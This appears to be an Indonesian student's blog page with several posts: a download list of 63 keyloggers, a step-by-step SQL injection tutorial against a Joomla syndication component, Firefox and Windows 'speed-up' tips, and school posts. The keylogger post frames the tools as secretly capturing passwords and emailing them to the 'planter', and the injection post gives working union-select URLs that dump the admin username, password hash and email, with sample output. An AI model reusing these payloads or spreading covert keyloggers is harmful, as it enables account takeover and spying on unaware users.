Ad 468 X 60


Koleksi 63 Keylogger Pilihan

Macam" keylogger ada 63....
hmmm sebelum ke situ..
gw mau tanya...

Apa si Keylogger ???

Ga tau ? ya ampunnn.... ck ck ck

Apa sih keylogger ?
Keylogger merupakan tools yang pada dasarnya memiliki sebuah fungsi untuk melakukan monitoring semua akitivitas yang dilakukan oleh user pada sebuah PC. Mulai dari merekam password yang diketikan, chatting di instant messaging, program apa saja yang dijalankan oleh user, apa yang dilakukan user pada program tersebut, dan semua yang diketikkan di keyboard hingga pergerakan mouse, bahkan beberapa keylogger yang telah lama beredar mengincludekan fasilitas pengcapture layar monitor setiap 5 menit sekali, dan outputnya adalah HTML. Ada beberapa keylogger yang cukup menarik, diantaranya ada yang dapat mengirim hasil dari monitoring aktivitas tersebut ke email sang penanam keylogger tersebut. Sehingga si penanam keylogger tersebut dapat melihat semua aktivitas yang dilakukan oleh user pada sebuah pc melalui email.



Tadi gw uda bilang kan, keylogger ada 63 macam...

Berikut daftarnya :
1. 007 Keylogger Spy Software 3.873
2. Active Key Logger 2.4
3. Activity Keylogger 1.80.21
4. Activity Logger 3.7.2132
5. ActMon Computer Monitoring 5.20
6. Actual Spy 2.8
7. Advanced Invisible Keylogger v1.9
8. Advanced Keylogger 1.8
9. Ardamax Keylogger 2.9
10. BlazingTools Perfect Keylogger 1.68
11. Blazingtools Remote Logger v2.3
12. Data Doctor KeyLogger Advance v3.0.1.5
13. Local Keylogger Pro 3.1
14. ExploreAnywhere Keylogger Pro 1.7.8
15. Family Cyber Alert 4.06
16. Family Keylogger 2.80
17. Firewall bypass Keylogger 1.5
18. Free Keylogger 2.53
19. Ghost Keylogger 3.80
20. Golden Eye 4.5
21. Golden KeyLogger 1.32
22. Handy Keylogger 3.24 build 032
23. Home Keylogger 1.77
24. Inside Keylogger 4.1
25. iOpus Starr PC and Internet Monitor 3.23
26. iSpyNow v2.0
27. KeyScrambler 1.3.2
28. Keystroke Spy 1.10
29. KGB Keylogger 4.2
30. KGB Spy 3.84
31. LastBit Absolute Key Logger 2.5.283
32. Metakodix Stealth Keylogger 1.1.0
33. Network Event Viewer v6.0.0.42
34. OverSpy v2.5
35. PC Activity Monitor Professional 7.6.3
36. PC Spy Keylogger 2.3 build 0313
37. PC Weasel 2.5
38. Personal PC Spy v1.9.5
39. Power Spy 6.10
40. Powered Keylogger v2.2.1.1920
41. Quick Keylogger 2.1
42. Radar 1.0
43. Real Spy Monitor 2.80
44. Real Spy Monitor 2.80
45. Remote Desktop Spy 4.04
46. Remote KeyLogger 1.0.1
47. Revealer Keylogger Free 1.33
48. SC Keylogger Pro 3.2
49. Smart Keystroke Recorder Pro
50. Spector Pro 6.0.1201
51. SpyAnytime PC Spy 2.42
52. SpyBuddy 3.7.5
53. Spytech SpyAgent 6.02.07
54. Spytector 1.3.5
55 Stealth Key Logger 4.5
56. System keylogger 2.0.0
57. Tim’s Keylogger 1.0
58. Tiny Keylogger 2.0
59. Total Spy 2.7
60. Windows Keylogger 5.04
61. Win-Spy Pro 8.9.109
62. XP Advanced Keylogger 2.5
63. XPCSpy Pro version 3.01

Download aja di link yg ada di bawah ini...

KLIK for Part 1

KLIK for Part 2

Implementasi SQL Injection pada Joomla

Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.

Ya, Langsung aja …

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1



Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( ‘ ) di belakangnya.

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1′




Apa yang terjadi ? … error…

Langkah selanjutnya adalah cari urutan si table ‘dssyndicate_feeds’ dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda :

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/* –> errornya sama

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* –> errornya berbeda

perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya.

Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.

Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+jos_users

lihat paling akhir dari baris tersebut,
from+jos_users

jos_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.

Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,





Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan.




Lihat angka 2 di dalam tag (title) :

(title)2 (18)(/title)

Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini …

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+jos_users




perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan :

(title)5.0.33 (18)(/title)

Mysql versi 5.0.33 :D , sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin. :D .

Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users

jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut …

(title)admin (18)(/title)

Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
concat(username,0×3a,password,0×3a,email,0×3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users

perhatikan, string username, diganti dengan concat(username,0×3a,password,0×3a,email,0×3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :

0×3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini :



admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:alkemail@gmail.com:Super Administrator

Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : alkemail@gmail.com
User type : Super Administrator

Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi. :D . Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut.

Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya.

Di artikel selanjutnya penulis akan menjalankan konsep sederhana password crack untuk joomla menggunakan php. Tunggu kelanjutannya …

Untuk keperluan eksperimen, silahkan download filenya di sini :
1. KLIK Disini !

2. KLIK Disini !

Mempercepat koneksi internet #4

Cara mempercepat koneksi internet bagian ini juga masih menggunakan Mozilla Firefox..



IV. Bagi pengguna Firefox, silahkan pasang Adblock

silahkan DOWNLOAD Di Sini !

Fungsinya adalah untuk mem-filter iklan-iklan yang tidak perlu pada saat kita browsing, sehingga proses loading akan menjadi lebih cepat dan maksimal.


so bro, Coba yah ^^

Mempercepat koneksi internet #3

Kali ini cara mempercepat koneksi internet menggunakan browser Mozilla Firefox..
di sini...

III. Jika menggunakan Browser Firefox gunakan add on Fasterfox, Download ada DISINI

Fasterfox adalah sebuah add on yang berfungsi untuk mempercepat koneksi dengan melakukan optimasi pada network dan cache browser. Fungsi dari cache adalah untuk menyimpan data sementara dari website yang kita kunjungi, sehingga ketika kita membuka kembali website tersebut proses loading-nya akan lebih cepat karena datanya telah disimpan di cache.

Beberapa optimasi yang dapat dilakukan oleh fasterfox adalah: HTTP pipelining, Memory caching,Disk caching,DNS caching,FastBack caching.


Download it ! ^^

Mempercepat koneksi internet #2

Kali ini tips mempercepat koneksi internet dengan DNS dari OpenDNS...
Ni mengganti DNS kita yg lama jadi yg baru...

II. Gunakan DNS dari OpenDNS untuk koneksi internet yang lebih cepat dan lebih aman.

1. Klik Start
2. Klik Control Panel
3. Pilih Network & Internet Connection
4. Klik Network Connection
5. Klik Kanan Local Area Connection pilih Properties
6. Pilih Internet Protocol (TCP/IP) kemudian Klik Properties
7. Klik Use Following DNS Server
8. Isi Preferred DNS Server dengan angka : 208.67.222.222
9. Isi Alternate DNS Server dengan angka : 208.67.220.220
10. Kemudian Klik OK

Wanna Try it ?

Mempercepat koneksi internet #1

Cara mempercepat koneksi internet dengan merubah bandwith,
saya punya tips buat mempercepat koneksi internet dengan merubah bandwith anda...

Pada dasarnya OS windows sudah membatasi bandwidth untuk koneksi internet sebanyak 20% dari total bandwidth yang seharusnya bisa maksimal,Jika anda ingin menambah bandwidth internet supaya koneksinya terasa lebih cepat dan kencang bisa dengan cara mengurangi atau mengosongkan batasan bandwidth tersebut supaya pada Windows kita bisa maksimal dalam menggunakan bandwidth yang sudah ada.

Ikuti petunjuknya seperti dibawah ini :

1. Klik Start
2. Klik Run
3. Ketik gpedit.msc
4. Kemudian klik Ok
5. Setelah masuk klik Administrative Templates
6. Kemudian Klik Network
7. Setelah terbuka klik QoS Packet scheduler
8. Kemudian klik Limit Reservable Bandwidth
9. Dan setelah terbuka ubah setting menjadi Enable
10. Kemudian ubah Bandwidth Limitnya menjadi 0
11. Klik Apply,ok
12. Kemudian keluar dan Restart komputer


Tips : Kalo komputer anda menggunakan Deep-Freeze, UnDeep-Freeze dahulu...

Wanna Try ? ^^

Trik mempercepat koneksi internet

Mempercepat koneksi internet menggunakan Mozilla Firefox 3.0
kalo lum 3.0 install aja dulu..


1. Aktifkan browser Firefox-3.0 Anda dan ketikkan perintah “about:config” (tanpa tanda kutip), di address barnya.

2. Anda akan dibawa ke halaman konfigurasi Firefox-3.0. Kalau ada peringatan untuk hati-hati mengubah pengaturan pada halaman tersebut, klik yes atau ok saja.

3. Pada filter search bar di halaman konfigurasi, ketikkan “network.http.pipelining”. Pastikan valuenya sudah diset dengan nilai “true”. Jika masih “false”, klik ganda untuk menjadikannya “true”.

4. Kembali ke filter search bar, ketikkan “network.http.pipelining.maxrequests”. Double klik pada opsi ini dan rubah nilainya (value) menjadi 8.

5. Kembali ke filter search bar, ketikkan “network.http.proxy.pipelining”, double klik untuk merubah valuenya menjadi ‘true’.

6. Kembali ke filter search bar, ketikkan “network.dns.disableIPv6″. Double klik untuk merubah nilainya menjadi ‘true’.

7. Klik kanan di halaman konfigurasi tersebut dimanapun terserah, pilih new –>boolean. Ketikkan “content.interrupt.parsing”pada popup windows yang muncul kemudian klik OK. Ketika prompt untuk pilihan muncul, pilih ‘true’.

8. Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.max.tokenizing.time”. Pada prompt value yang muncul masukkan nilai 2250000.

9. Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.notify.interval”. Masukkan nilai 750000 pada prompt value yang muncul.

10. Kembali klik kanan halaman konfigurasi, pilih new –> boolean. Ketikkan “content.notify.ontimer”. Pilih ‘true’ untuk isian prompt value yang muncul.

11. Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.notify.backoffcount”. Pada prompt value yang muncul isikan value ‘5′.

12. Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.switch.threshold”. Isikan nilai 750000 pada prompt integer value yang muncul.

13. Terakhir, kembali klik kanan pada halaman konfigurasi, pilih new –>integer. Ketikkan “nglayout.initialpaint.delay”. Isikan nilai ‘0′ pada prompt isian nilai yang muncul.



Kalo sudah restart Mozillanya, and rasain perbedaanya !
Try IT !

ekstrakurikuler di sekolahku

Di sekolah saya tidak banyak ekskul...
mungkin sekolah saya berbeda dengan sekolah" lain yg banyak mengadakan eksul...
tapi walau begitu saya tetap bangga bisa sekolah...

masih banyak anak" yang putus sekolah...

okey, langsung aja yah..
ekskul di sekolah saya ada 7.... yaitu :

1.ACC = Al-Irysad Computer Club
yaitu sebuah club komputer, club ini tujuannya bertukar ilmu anatara TKJ dan RPL...
jadi, RPL akan belajar mengenai dasar TKJ, dan TKJ belajar mengenai dasar RPL...
gitu temen" ....

2.English Club
yaitu club bahasa inggris...
di ekskul ini, murid" akan di ajarkan tenang Bahasa Inggir dasar...
seperti Verb. dan yang lainya....

3.Rohis
yaitu sebuah ekskul WAJIB, di sini murid" akan di didik oleh mentor" masing" kelompok untuk menjadi anak" yang soleh dan solehah...
bertujuan untuk menjadikan anak" al-irysad berakhlak baik.

4.Olahraga
yaitu ekskul penjas yang terdiri dari beberapa macem cabang..
seperi footsal, karate, panahan, volly, dayung.

5.OSIS
yaitu ekskul umun di setiap" sekolah...

6.PMR
yaitu ekskul remaja palang merah..
ekskul ini melatih murid" bisa menangani orang" yang sakit, atau pingsan, Dsb...

7.DKM = Dewan Keamanan Masjid
yaitu ekskul yang hanya bisa diikuti oleh murid laki" saja..
karena ekskul ini bertujuan untuk melatih kemandiriian murid, dengan menginap di masjid sekolahan....



yah.. hanya segitu saja yang saya bisa sampaikan..

kurang lebihnya saya mohon maaf iah...

pemanfaatan TIK di sekolahku

Sekolah saya adalah tempat saya mencari ilmu. . .

saya sekolah di SMK INFORMATIKA Al-Irsyad Al-Islammiyah. . .

di sini saya belajar banyak tentang TIK....
saya sangat berharap sekolah saya ini bisa berkembang dan maju di muka umum...
manfaat adanya TIK di sekolah saya banyak...

kami murid" di Skinfa bisa belajar tentang banyak hal di dunia pemogramam...
banyak hal yang bisa kami dapatkan...
misalnya saja.. :
kami belajar Turbo Pascal.. PHP.. HTML.. Visual Basic.. dan program" lainnya....

manfaat TIK di sekolah saya,
saya bisa menjadi orang yang ahli di bidang pemrograman komputer..
saya bisa lebih mengerti apa itu bahasa komputer....

saya sekolah di sekolah yang mempelajari dunia TIK....
TIK sangat penting untuk masa kini dan masa depan nanti...

saya juga berharap bisa menjadi orang yang sukses di bidang pemrograman TIK...



mungkin hanya sekian yang dapat saya postingkan...

kurang lebihnya saya mohon maaf